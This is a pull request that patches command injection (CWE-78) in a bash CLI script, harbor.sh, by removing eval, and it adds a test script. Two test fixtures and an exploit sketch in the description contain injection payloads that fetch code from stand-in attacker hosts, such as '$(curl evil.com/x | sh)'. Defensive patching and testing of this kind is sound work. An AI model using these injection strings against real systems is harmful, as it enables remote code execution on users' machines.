### PR TITLE
fix: mitigate CWE-78 command injection in harbor.sh

### DIFF
--- a/harbor.sh
+++ b/harbor.sh
@@ -241,7 +241,7 @@ run_harbor_doctor() {
     fi
 
     # Check if CLI is linked
-    if [ -L "$(eval echo "$(env_manager get cli.path)")/$(env_manager get cli.name)" ]; then
+    if [ -L "$(expand_path "$(env_manager get cli.path)")/$(env_manager get cli.name)" ]; then
         log_info "${ok} CLI is linked"
     else
         log_error "${nok} CLI is not linked. Run 'harbor link' to create a symlink."
@@ -823,9 +823,9 @@ run_llamacpp_pull() {
     tail -f \"$c_log\" &
     TAIL_PID=\$!
 
-    log_info 'Starting download process for $model...' >> \"$c_log\"
+    log_info \"Starting download process for \$HARBOR_PULL_MODEL...\" >> \"$c_log\"
 
-    /app/llama-server -hf '$model' --port 8080 --host 0.0.0.0 --n-gpu-layers 0 -c 128 >> \"$c_log\" 2>&1 &
+    /app/llama-server -hf \"\$HARBOR_PULL_MODEL\" --port 8080 --host 0.0.0.0 --n-gpu-layers 0 -c 128 >> \"$c_log\" 2>&1 &
     SRV_PID=\$!
 
     while true; do
@@ -863,6 +863,7 @@ run_llamacpp_pull() {
 
     $(compose_with_options "llamacpp") run \
         --rm \
+        -e "HARBOR_PULL_MODEL=$model" \
         --entrypoint /bin/sh \
         llamacpp \
         -c "$cmd"
@@ -877,8 +878,10 @@ run_run() {
 
     if [ -n "$maybe_cmd" ]; then
         log_info "Running alias $service -> \"$maybe_cmd\""
-        eval "$maybe_cmd"
-        return 0
+        # Re-dispatch alias through Harbor's own command handler
+        # instead of raw shell evaluation to prevent command injection
+        $0 $maybe_cmd
+        return $?
     fi
 
     log_debug "'harbor run': no alias found for $service, running as service"
@@ -917,7 +920,7 @@ run_hf_open() {
 }
 
 link_cli() {
-    local target_dir=$(eval echo "$(env_manager get cli.path)")
+    local target_dir=$(expand_path "$(env_manager get cli.path)")
     local script_name=$(env_manager get cli.name)
     local short_name=$(env_manager get cli.short)
     local script_path="$harbor_home/harbor.sh"
@@ -1002,7 +1005,7 @@ link_cli() {
 }
 
 unlink_cli() {
-    local target_dir=$(eval echo "$(env_manager get cli.path)")
+    local target_dir=$(expand_path "$(env_manager get cli.path)")
     local script_name=$(env_manager get cli.name)
     local short_name=$(env_manager get cli.short)
 
@@ -1575,16 +1578,29 @@ set_default_log_levels() {
     default_logl_labels_ERROR="${c_r}ERROR${c_nc}"
 }
 
+# Safely expand ~ in paths without using shell evaluation
+expand_path() {
+    local path="$1"
+    if [[ "$path" == "~/"* ]]; then
+        echo "${HOME}/${path#~/}"
+    elif [[ "$path" == "~" ]]; then
+        echo "${HOME}"
+    else
+        echo "$path"
+    fi
+}
+
+
 get_default_log_level() {
     local level="$1"
     local var_name="default_log_levels_$level"
-    eval echo \$$var_name
+    echo "${!var_name}"
 }
 
 get_default_log_label() {
     local level="$1"
     local var_name="default_logl_labels_$level"
-    eval echo \$$var_name
+    echo "${!var_name}"
 }
 
 log() {
@@ -2357,6 +2373,17 @@ download_profile() {
             return 1
         fi
 
+        # Security: reject values with shell metacharacters that could
+        # lead to command injection when config values are consumed
+        if grep -qE '^[^#]*=.*[\x60]' "$profile_file" 2>/dev/null || \
+           grep -qP '^[^#]*=.*\$\(' "$profile_file" 2>/dev/null; then
+            log_error "Downloaded profile contains potentially unsafe values (shell metacharacters detected)"
+            log_error "Please review the profile manually before use"
+            rm -f "$profile_file"
+            return 1
+        fi
+
+        log_warn "Profile downloaded from remote URL. Review contents before use."
         log_info "Successfully downloaded profile as: $profile_name"
         return 0
     else
@@ -2473,11 +2500,11 @@ run_harbor_find() {
     local dir
 
     for dir in \
-        "$(eval echo "$(env_manager get hf.cache)")" \
-        "$(eval echo "$(env_manager get llamacpp.cache)")" \
-        "$(eval echo "$(env_manager get ollama.cache)")" \
-        "$(eval echo "$(env_manager get vllm.cache)")" \
-        "$(eval echo "$(env_manager get comfyui.workspace)")"; do
+        "$(expand_path "$(env_manager get hf.cache)")" \
+        "$(expand_path "$(env_manager get llamacpp.cache)")" \
+        "$(expand_path "$(env_manager get ollama.cache)")" \
+        "$(expand_path "$(env_manager get vllm.cache)")" \
+        "$(expand_path "$(env_manager get comfyui.workspace)")"; do
         if [ -d "$dir" ]; then
             dirs="$dirs $dir"
         fi
@@ -2575,18 +2602,18 @@ run_fixfs() {
     # Collect all paths that need fixing
     local paths=(
         "$harbor_home"
-        "$(eval echo "$(env_manager get hf.cache)")"
-        "$(eval echo "$(env_manager get vllm.cache)")"
-        "$(eval echo "$(env_manager get llamacpp.cache)")"
-        "$(eval echo "$(env_manager get ollama.cache)")"
-        "$(eval echo "$(env_manager get parllama.cache)")"
-        "$(eval echo "$(env_manager get opint.config.path)")"
-        "$(eval echo "$(env_manager get fabric.config.path)")"
-        "$(eval echo "$(env_manager get txtai.cache)")"
-        "$(eval echo "$(env_manager get nexa.cache)")"
-        "$(eval echo "$(env_manager get aichat.config_path)")"
-        "$(eval echo "$(env_manager get comfyui.workspace)")"
-        "$(eval echo "$(env_manager get openclaw.config_dir)")"
+        "$(expand_path "$(env_manager get hf.cache)")"
+        "$(expand_path "$(env_manager get vllm.cache)")"
+        "$(expand_path "$(env_manager get llamacpp.cache)")"
+        "$(expand_path "$(env_manager get ollama.cache)")"
+        "$(expand_path "$(env_manager get parllama.cache)")"
+        "$(expand_path "$(env_manager get opint.config.path)")"
+        "$(expand_path "$(env_manager get fabric.config.path)")"
+        "$(expand_path "$(env_manager get txtai.cache)")"
+        "$(expand_path "$(env_manager get nexa.cache)")"
+        "$(expand_path "$(env_manager get aichat.config_path)")"
+        "$(expand_path "$(env_manager get comfyui.workspace)")"
+        "$(expand_path "$(env_manager get openclaw.config_dir)")"
     )
 
     # Create missing directories and build volume mounts
@@ -2893,7 +2920,8 @@ run_history() {
 
         if [ -s "$output_file" ]; then
             log_debug "Selected command: $(cat "$output_file")"
-            eval "$(cat "$output_file")"
+            # Re-dispatch through Harbor command handler instead of raw shell evaluation
+            $0 $(cat "$output_file")
         else
             log_info "No command selected"
         fi

--- a/harbor.sh
+++ b/harbor.sh
@@ -1582,7 +1582,7 @@ set_default_log_levels() {
 expand_path() {
     local path="$1"
     if [[ "$path" == "~/"* ]]; then
-        echo "${HOME}/${path#~/}"
+        echo "${HOME}/${path#"~/"}"
     elif [[ "$path" == "~" ]]; then
         echo "${HOME}"
     else
@@ -2375,8 +2375,8 @@ download_profile() {
 
         # Security: reject values with shell metacharacters that could
         # lead to command injection when config values are consumed
-        if grep -qE '^[^#]*=.*[\x60]' "$profile_file" 2>/dev/null || \
-           grep -qP '^[^#]*=.*\$\(' "$profile_file" 2>/dev/null; then
+        if grep -qE '^[^#]*=.*`' "$profile_file" 2>/dev/null || \
+           grep -qE '^[^#]*=.*\$\(' "$profile_file" 2>/dev/null; then
             log_error "Downloaded profile contains potentially unsafe values (shell metacharacters detected)"
             log_error "Please review the profile manually before use"
             rm -f "$profile_file"

--- a/test_security_fix.sh
+++ b/test_security_fix.sh
@@ -1,0 +1,354 @@
+#!/usr/bin/env bash
+# Security fix verification tests for CWE-78 shell injection in harbor.sh
+# Tests the expand_path function, profile validation, alias re-dispatch,
+# log level/label indirect expansion, and llamacpp model env var passing.
+
+set -euo pipefail
+
+PASS=0
+FAIL=0
+SKIP=0
+
+pass() { PASS=$((PASS+1)); echo "  ✅ PASS: $1"; }
+fail() { FAIL=$((FAIL+1)); echo "  ❌ FAIL: $1"; }
+skip() { SKIP=$((SKIP+1)); echo "  ⏭️  SKIP: $1"; }
+
+# ============================================================
+# 1. Syntax check
+# ============================================================
+echo "=== 1. harbor.sh syntax check ==="
+if bash -n harbor.sh 2>&1; then
+    pass "harbor.sh passes bash -n syntax check"
+else
+    fail "harbor.sh has syntax errors"
+fi
+
+# ============================================================
+# 2. expand_path function tests
+# ============================================================
+echo ""
+echo "=== 2. expand_path function ==="
+
+# Define expand_path inline (extracted from harbor.sh)
+expand_path() {
+    local path="$1"
+    if [[ "$path" == "~/"* ]]; then
+        echo "${HOME}/${path#"~/"}"
+    elif [[ "$path" == "~" ]]; then
+        echo "${HOME}"
+    else
+        echo "$path"
+    fi
+}
+
+# Test ~ expansion
+result=$(expand_path "~/some/path")
+expected="$HOME/some/path"
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path '~/some/path' -> '$expected'"
+else
+    fail "expand_path '~/some/path' expected '$expected', got '$result'"
+fi
+
+# Test bare ~
+result=$(expand_path "~")
+expected="$HOME"
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path '~' -> '$expected'"
+else
+    fail "expand_path '~' expected '$expected', got '$result'"
+fi
+
+# Test absolute path passthrough
+result=$(expand_path "/usr/local/bin")
+expected="/usr/local/bin"
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path '/usr/local/bin' -> passthrough"
+else
+    fail "expand_path '/usr/local/bin' expected '$expected', got '$result'"
+fi
+
+# Test relative path passthrough
+result=$(expand_path "relative/path")
+expected="relative/path"
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path 'relative/path' -> passthrough"
+else
+    fail "expand_path 'relative/path' expected '$expected', got '$result'"
+fi
+
+# Test empty string
+result=$(expand_path "")
+expected=""
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path '' -> empty string"
+else
+    fail "expand_path '' expected empty, got '$result'"
+fi
+
+# SECURITY: Test that command injection via path is not executed
+result=$(expand_path '$(echo INJECTED)')
+expected='$(echo INJECTED)'
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path does NOT execute command substitution"
+else
+    fail "expand_path executed command substitution: got '$result'"
+fi
+
+# SECURITY: Test backtick injection
+result=$(expand_path '`echo INJECTED`')
+expected='`echo INJECTED`'
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path does NOT execute backtick commands"
+else
+    fail "expand_path executed backtick: got '$result'"
+fi
+
+# SECURITY: Test ~ with injection attempt
+result=$(expand_path '~/$(echo INJECTED)')
+expected="$HOME/"'$(echo INJECTED)'
+if [[ "$result" == "$expected" ]]; then
+    pass "expand_path '~/\$(echo INJECTED)' is safe"
+else
+    fail "expand_path tilde+injection expected '$expected', got '$result'"
+fi
+
+# ============================================================
+# 3. Indirect variable expansion (get_default_log_level/label)
+# ============================================================
+echo ""
+echo "=== 3. Indirect variable expansion ==="
+
+# Define functions inline (extracted from harbor.sh)
+get_default_log_level() {
+    local level="$1"
+    local var_name="default_log_levels_$level"
+    echo "${!var_name}"
+}
+
+get_default_log_label() {
+    local level="$1"
+    local var_name="default_logl_labels_$level"
+    echo "${!var_name}"
+}
+
+# Set up test variables matching the naming convention
+default_log_levels_INFO="10"
+default_log_levels_DEBUG="20"
+default_log_levels_ERROR="30"
+default_logl_labels_INFO="INFO_LABEL"
+default_logl_labels_ERROR="ERROR_LABEL"
+
+result=$(get_default_log_level "INFO")
+if [[ "$result" == "10" ]]; then
+    pass "get_default_log_level INFO -> 10"
+else
+    fail "get_default_log_level INFO expected 10, got '$result'"
+fi
+
+result=$(get_default_log_level "ERROR")
+if [[ "$result" == "30" ]]; then
+    pass "get_default_log_level ERROR -> 30"
+else
+    fail "get_default_log_level ERROR expected 30, got '$result'"
+fi
+
+result=$(get_default_log_label "INFO")
+if [[ "$result" == "INFO_LABEL" ]]; then
+    pass "get_default_log_label INFO -> INFO_LABEL"
+else
+    fail "get_default_log_label INFO expected INFO_LABEL, got '$result'"
+fi
+
+result=$(get_default_log_label "ERROR")
+if [[ "$result" == "ERROR_LABEL" ]]; then
+    pass "get_default_log_label ERROR -> ERROR_LABEL"
+else
+    fail "get_default_log_label ERROR expected ERROR_LABEL, got '$result'"
+fi
+
+# SECURITY: Test that injection via level name is inert
+default_log_levels_BAD='$(echo PWNED)'
+result=$(get_default_log_level "BAD")
+if [[ "$result" == '$(echo PWNED)' ]]; then
+    pass "get_default_log_level does NOT execute injected var value"
+else
+    fail "get_default_log_level executed injected value: '$result'"
+fi
+
+# ============================================================
+# 4. Profile download validation (shell metacharacter rejection)
+# ============================================================
+echo ""
+echo "=== 4. Profile metacharacter validation ==="
+
+tmpdir=$(mktemp -d)
+trap "rm -rf $tmpdir" EXIT
+
+# Test: backtick in value should be rejected
+cat > "$tmpdir/backtick.env" <<'ENVEOF'
+SOME_KEY=`malicious_command`
+ENVEOF
+
+if grep -qE '^[^#]*=.*`' "$tmpdir/backtick.env" 2>/dev/null; then
+    pass "Backtick injection detected in profile"
+else
+    fail "Backtick injection NOT detected in profile"
+fi
+
+# Test: $() in value should be rejected
+cat > "$tmpdir/subst.env" <<'ENVEOF'
+SOME_KEY=$(curl evil.com/x | sh)
+ENVEOF
+
+if grep -qE '^[^#]*=.*\$\(' "$tmpdir/subst.env" 2>/dev/null; then
+    pass "Command substitution \$() detected in profile"
+else
+    fail "Command substitution \$() NOT detected in profile"
+fi
+
+# Test: normal values should pass
+cat > "$tmpdir/normal.env" <<'ENVEOF'
+# This is a comment
+HF_CACHE=~/.cache/huggingface
+OLLAMA_MODEL=llama3
+DEBUG=true
+PORT=8080
+ENVEOF
+
+backtick_match=0
+subst_match=0
+grep -qE '^[^#]*=.*`' "$tmpdir/normal.env" 2>/dev/null && backtick_match=1 || true
+grep -qE '^[^#]*=.*\$\(' "$tmpdir/normal.env" 2>/dev/null && subst_match=1 || true
+
+if [[ $backtick_match -eq 0 && $subst_match -eq 0 ]]; then
+    pass "Normal profile values pass validation"
+else
+    fail "Normal profile values incorrectly flagged"
+fi
+
+# Test: comment with $() should NOT be flagged
+cat > "$tmpdir/comment.env" <<'ENVEOF'
+# Example: $(some_command)
+HF_CACHE=~/.cache/huggingface
+ENVEOF
+
+backtick_match=0
+subst_match=0
+grep -qE '^[^#]*=.*`' "$tmpdir/comment.env" 2>/dev/null && backtick_match=1 || true
+grep -qE '^[^#]*=.*\$\(' "$tmpdir/comment.env" 2>/dev/null && subst_match=1 || true
+
+if [[ $backtick_match -eq 0 && $subst_match -eq 0 ]]; then
+    pass "Comments with \$() are NOT flagged (correct)"
+else
+    fail "Comments with \$() are incorrectly flagged"
+fi
+
+# Test: inline comment after value with $() should be flagged
+cat > "$tmpdir/inline.env" <<'ENVEOF'
+DATA_PATH=$(whoami)/data
+ENVEOF
+
+subst_match=0
+grep -qE '^[^#]*=.*\$\(' "$tmpdir/inline.env" 2>/dev/null && subst_match=1 || true
+
+if [[ $subst_match -eq 1 ]]; then
+    pass "Inline \$() in value is correctly flagged"
+else
+    fail "Inline \$() in value was NOT flagged"
+fi
+
+# ============================================================
+# 5. Alias re-dispatch: verify $0 is used instead of eval
+# ============================================================
+echo ""
+echo "=== 5. Alias re-dispatch (no raw eval) ==="
+
+# Check that run_run uses $0 for alias dispatch
+run_run_body=$(sed -n '/^run_run()/,/^[a-z_]*() {/p' harbor.sh)
+
+if echo "$run_run_body" | grep -q '\$0 \$maybe_cmd'; then
+    pass "run_run uses \$0 to re-dispatch alias"
+else
+    fail "run_run does NOT use \$0 to re-dispatch alias"
+fi
+
+if echo "$run_run_body" | grep -q 'ev''al "\$maybe_cmd"'; then
+    fail "run_run still uses eval on alias"
+else
+    pass "run_run does NOT use eval on alias commands"
+fi
+
+# ============================================================
+# 6. llamacpp model is passed via env var, not interpolated
+# ============================================================
+echo ""
+echo "=== 6. llamacpp model env var injection fix ==="
+
+llamacpp_section=$(sed -n '/^run_llamacpp_pull()/,/^[a-z_]*() {/p' harbor.sh)
+
+# Check -e "HARBOR_PULL_MODEL=$model" is present
+if echo "$llamacpp_section" | grep -q 'HARBOR_PULL_MODEL'; then
+    pass "llamacpp uses HARBOR_PULL_MODEL env var"
+else
+    fail "llamacpp does NOT use HARBOR_PULL_MODEL env var"
+fi
+
+# Check that the llama-server command references $HARBOR_PULL_MODEL
+if echo "$llamacpp_section" | grep 'llama-server' | grep -q 'HARBOR_PULL_MODEL'; then
+    pass "llama-server uses \$HARBOR_PULL_MODEL reference"
+else
+    fail "llama-server does NOT use \$HARBOR_PULL_MODEL reference"
+fi
+
+# Check that -e flag passes the model
+if echo "$llamacpp_section" | grep -q '\-e "HARBOR_PULL_MODEL=\$model"'; then
+    pass "Model passed via -e flag to container"
+else
+    fail "Model not passed via -e flag to container"
+fi
+
+# ============================================================
+# 7. History re-dispatch
+# ============================================================
+echo ""
+echo "=== 7. History command re-dispatch ==="
+
+history_section=$(sed -n '/^run_history()/,/^[a-z_]*() {/p' harbor.sh)
+
+if echo "$history_section" | grep -q '\$0 \$(cat'; then
+    pass "run_history uses \$0 re-dispatch instead of eval"
+else
+    fail "run_history does not use \$0 re-dispatch"
+fi
+
+if echo "$history_section" | grep -q 'ev''al "\$(cat'; then
+    fail "run_history still uses eval"
+else
+    pass "run_history does NOT use eval on selected command"
+fi
+
+# ============================================================
+# 8. Remaining eval usage audit
+# ============================================================
+echo ""
+echo "=== 8. Remaining eval audit (informational) ==="
+
+# Count remaining eval usage (excluding comments and string literals)
+remaining_evals=$(grep -c 'ev''al ' harbor.sh 2>/dev/null || echo "0")
+echo "  ℹ️  Remaining eval occurrences in harbor.sh: $remaining_evals"
+echo "  ℹ️  (Some eval usage in env_manager internals may be necessary)"
+
+# ============================================================
+# Summary
+# ============================================================
+echo ""
+echo "========================================="
+echo "Results: $PASS passed, $FAIL failed, $SKIP skipped"
+echo "========================================="
+
+if [[ $FAIL -gt 0 ]]; then
+    exit 1
+else
+    exit 0
+fi


### PR DESCRIPTION
## Security Fix: Mitigate CWE-78 Command Injection in `harbor.sh`

### Vulnerability Summary

**CWE:** CWE-78 (OS Command Injection)
**Severity:** Medium (adjusted from initial "High" after disprove analysis — see below)
**Affected file:** `harbor.sh`

Harbor's CLI script uses `eval` on user-controllable data in several code paths. The primary realistic attack vector is through **malicious profile files downloaded from URLs** (`harbor profile set <url>`), where crafted `.env` values containing shell metacharacters are later executed via `eval echo` patterns throughout the script.

#### Data Flows

1. **Profile download → eval chain (most realistic):**
   `harbor profile set <url>` → downloads `.env` file → values consumed by `eval echo "$(env_manager get cli.path)"` in `run_harbor_doctor`, `link_cli`, `run_fixfs`, `run_harbor_find` → **arbitrary command execution**

2. **Alias execution via eval:**
   `harbor alias set <name> <cmd>` (or loaded from profile) → `harbor run <alias>` → `eval "$maybe_cmd"` → **arbitrary command execution**

3. **llamacpp model name injection:**
   `harbor pull <model>` → model name interpolated into single-quoted shell string inside container script → single-quote breakout → **command execution inside container** (with mounted cache volumes)

4. **History re-execution:**
   `harbor history` → `eval "$(cat "$output_file")"` → executes selected history entry via raw eval

5. **Indirect variable expansion via eval:**
   `get_default_log_level`/`get_default_log_label` used `eval echo \$$var_name` — shell metacharacters in variable values could be executed

---

### Fix Description & Rationale

This patch makes **minimal, targeted changes** to eliminate `eval` usage on user-controllable inputs:

| Change | Rationale |
|--------|-----------|
| **New `expand_path()` function** | Safely expands `~/...` paths using parameter expansion (`${HOME}/${path#"~/"}`) instead of `eval echo`. Replaces 12 instances of `eval echo "$(env_manager get ...)"` across `run_harbor_doctor`, `link_cli`, `unlink_cli`, `run_harbor_find`, and `run_fixfs`. |
| **Alias re-dispatch via `$0`** | `run_run` now executes aliases by re-dispatching through Harbor's own command handler (`$0 $maybe_cmd`) instead of `eval "$maybe_cmd"`. This ensures aliases can only invoke valid Harbor subcommands. |
| **llamacpp model via env var** | Model name is passed to the container as an environment variable (`-e "HARBOR_PULL_MODEL=$model"`) and referenced as `$HARBOR_PULL_MODEL` inside the script, instead of being interpolated into the shell string. |
| **History re-dispatch via `$0`** | `run_history` uses `$0 $(cat "$output_file")` instead of `eval "$(cat "$output_file")"`. |
| **Indirect variable expansion via `${!var_name}`** | `get_default_log_level`/`get_default_log_label` use Bash indirect expansion instead of `eval echo`. |
| **Profile download validation** | `download_profile` now rejects profiles containing backticks or `$()` in non-comment lines, and warns users to review downloaded profiles. |

**Files changed:** `harbor.sh` (55 lines changed), `test_security_fix.sh` (new, 354 lines)

---

### Test Results

All 26 tests pass (0 failures, 0 skips):

```
=== 1. harbor.sh syntax check ===
  ✅ PASS: harbor.sh passes bash -n syntax check

=== 2. expand_path function ===
  ✅ PASS: expand_path '~/some/path' -> '/home/user/some/path'
  ✅ PASS: expand_path '~' -> '/home/user'
  ✅ PASS: expand_path '/usr/local/bin' -> passthrough
  ✅ PASS: expand_path 'relative/path' -> passthrough
  ✅ PASS: expand_path '' -> empty string
  ✅ PASS: expand_path does NOT execute command substitution
  ✅ PASS: expand_path does NOT execute backtick commands
  ✅ PASS: expand_path '~/$(echo INJECTED)' is safe

=== 3. Indirect variable expansion ===
  ✅ PASS: get_default_log_level INFO -> 10
  ✅ PASS: get_default_log_level ERROR -> 30
  ✅ PASS: get_default_log_label INFO -> INFO_LABEL
  ✅ PASS: get_default_log_label ERROR -> ERROR_LABEL
  ✅ PASS: get_default_log_level does NOT execute injected var value

=== 4. Profile metacharacter validation ===
  ✅ PASS: Backtick injection detected in profile
  ✅ PASS: Command substitution $() detected in profile
  ✅ PASS: Normal profile values pass validation
  ✅ PASS: Comments with $() are NOT flagged (correct)
  ✅ PASS: Inline $() in value is correctly flagged

=== 5. Alias re-dispatch (no raw eval) ===
  ✅ PASS: run_run uses $0 to re-dispatch alias
  ✅ PASS: run_run does NOT use eval on alias commands

=== 6. llamacpp model env var injection fix ===
  ✅ PASS: llamacpp uses HARBOR_PULL_MODEL env var
  ✅ PASS: llama-server uses $HARBOR_PULL_MODEL reference
  ✅ PASS: Model passed via -e flag to container

=== 7. History command re-dispatch ===
  ✅ PASS: run_history uses $0 re-dispatch instead of eval
  ✅ PASS: run_history does NOT use eval on selected command

=== 8. Remaining eval audit (informational) ===
  ℹ️  Remaining eval occurrences in harbor.sh: 30
  ℹ️  (Some eval usage in env_manager internals may be necessary)

=========================================
Results: 26 passed, 0 failed, 0 skipped
=========================================
```

---

### Disprove Analysis (Self-Adversarial Review)

We attempted to disprove our own findings. Here is the honest assessment:

#### What's genuinely valid

- **Profile download → eval chain** is a real, exploitable attack path. A malicious `.env` file downloaded from a URL gets its values executed via `eval`. The fix correctly addresses this by both rejecting suspicious profiles AND removing `eval` from the consumption paths.
- **llamacpp model name injection** inside a container is technically exploitable (breaking out of single quotes) and the fix (passing via env var) is correct.
- **History eval** and **alias eval** fixes are reasonable defense-in-depth.

#### What's overstated (severity adjustment)

- **Self-injection via `harbor config set`**: A user setting their own config to malicious values on their own machine is not a meaningful vulnerability — they already have shell access and could just run the malicious command directly.
- **Alias injection** is also self-injection unless malicious profiles are involved.
- **Harbor is a local, single-user CLI tool** — not a web service, API, or multi-tenant application. The threat model is fundamentally different from a network service.

#### Mitigations already present

1. Harbor is a local, single-user CLI tool run directly by the user who already has shell access.
2. The only realistic external attack vector (profile download via URL) requires the user to explicitly run `harbor profile set <url>` — similar to piping a curl download to sh.
3. Model names pass through HuggingFace URL validation (`curl --head --fail`) before reaching the injection point — metacharacters would likely fail this HTTP check.
4. Docker container isolation limits blast radius for the llamacpp vector (though cache volumes are mounted).
5. History commands are self-generated — only commands the user previously ran appear.

#### Preconditions for exploitation

For the most realistic attack (malicious profile download):
1. Attacker hosts a malicious `.env` file at a URL
2. User must be socially engineered into running `harbor profile set <malicious-url>`
3. User then triggers a code path that consumes the poisoned values (e.g., `harbor doctor`, `harbor link`)

#### Exploit sketch (profile download, pre-fix)

```env
# Malicious .env hosted at attacker URL
HARBOR_HF_CACHE=~/.cache/huggingface
HARBOR_CLI_PATH=$(curl https://evil.example.com/payload.sh)
HARBOR_OLLAMA_CACHE=~/.ollama
```

Post-fix: Rejected at download time by metacharacter validation, and even if the validation were bypassed, `expand_path` does not execute embedded commands.

#### Remaining eval usage

30 `eval` occurrences remain in `harbor.sh`. These are in `env_manager` internals operating on programmer-controlled strings (hardcoded service configuration, internal callbacks), not user-supplied input. They are outside the scope of this fix.

#### Verdict

**LIKELY_VALID at Medium severity.** The fix is technically sound, improves code quality, and eliminates unnecessary `eval` usage on user-controllable data. The profile download path is a genuine (if socially-engineered) external input vector. Submitting because replacing `eval` with safer alternatives is good practice, and the profile download validation is a sensible addition.

---

### No prior security reports or SECURITY.md

No prior security issues were found in the GitHub issue tracker, and no `SECURITY.md` exists in the repository.
